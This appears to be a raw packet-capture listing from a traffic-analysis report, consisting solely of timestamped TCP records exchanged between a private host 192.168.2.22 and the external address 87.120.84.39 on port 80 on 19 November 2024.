                                                                                                                                  Nov 19, 2024 18:08:04.436367989 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436378956 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436389923 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436696053 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.436696053 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.437139988 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437151909 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437163115 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437205076 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.437205076 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.437330961 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437341928 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437357903 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437381029 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.437403917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.437954903 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.438013077 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.578836918 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578850031 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578860044 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578871965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578882933 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578892946 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578903913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578947067 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578957081 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578967094 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578978062 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578989983 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578999043 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.579050064 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579050064 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579050064 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579050064 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579050064 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579216957 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.579307079 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707462072 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707472086 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707480907 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707490921 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707500935 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707501888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707501888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707501888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707501888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707503080 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707515001 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707525015 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707545996 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707562923 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707592010 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707604885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707611084 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707611084 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707616091 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707628012 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707628012 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707638979 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707648993 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707650900 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707650900 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707660913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707664967 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707673073 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707684040 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707693100 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707703114 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707712889 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707721949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707721949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707721949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707725048 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707721949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707736015 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707741976 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707747936 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707757950 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707762003 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707770109 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707779884 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707779884 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707825899 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707974911 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725538969 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725552082 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725562096 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725604057 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725604057 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725815058 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725825071 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725836039 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725846052 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725856066 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725864887 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725877047 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725883007 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725883007 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725883007 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725920916 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725925922 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725925922 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725934029 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725980997 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725980997 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726092100 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726103067 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726113081 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726129055 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726135015 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726144075 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726149082 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726162910 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726177931 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726188898 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726197004 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726200104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726200104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726200104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726200104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726200104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726207972 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726221085 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726242065 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726242065 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726243019 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726243019 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726269007 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726278067 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726289034 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726341963 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726341963 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726351976 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726361990 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726371050 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726382017 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726394892 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726408005 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726408005 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726411104 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726423025 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726433039 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726433039 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726445913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726457119 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726475954 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726475954 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726475954 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726497889 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726574898 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726624966 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726629019 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726639986 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726650953 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726660967 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726713896 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726713896 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726713896 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726742029 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726757050 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726767063 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726775885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726787090 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726798058 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726824999 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726829052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726829052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726829052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726829052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726835966 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726890087 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726890087 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817094088 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817094088 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817106009 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817132950 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817178011 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817194939 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817204952 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817222118 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817231894 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817241907 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817254066 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817262888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817262888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817262888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817262888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817265034 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817276955 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817297935 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817297935 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817321062 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817329884 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817361116 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817370892 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817404985 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817404985 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817486048 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817497015 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817509890 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817519903 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817531109 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817548037 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817548037 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817570925 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817572117 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817572117 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817600965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817611933 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817667007 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817667961 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817667961 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835676908 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835694075 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835705042 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835721016 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835732937 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835741997 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835756063 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835756063 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835791111 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835794926 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835807085 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835817099 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835828066 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835834026 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835845947 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835849047 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835859060 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835860968 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835872889 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835880995 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835892916 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835907936 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.836071968 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847412109 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847424030 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847433090 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847461939 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847472906 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847484112 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847484112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847485065 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847496033 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847507000 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847521067 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847521067 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847521067 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847541094 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847644091 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847688913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847695112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847701073 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847733974 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847765923 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847776890 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847789049 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847812891 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847829103 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847923994 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847934961 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847944975 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847954988 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847965956 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847968102 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847976923 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847979069 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847989082 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847995996 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.848000050 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.848006010 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.848018885 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.848031044 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.887821913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.887842894 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.887856007 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.887866974 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.887877941 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.887900114 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.887919903 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888025045 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888036013 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888046026 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888055086 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888071060 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888071060 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888087034 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888103962 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888184071 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888214111 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888223886 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888233900 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888242960 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888253927 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888256073 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888262987 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888264894 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888295889 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888323069 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888449907 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888461113 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888470888 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888492107 CET4916180192.168.2.2287.120.84.39
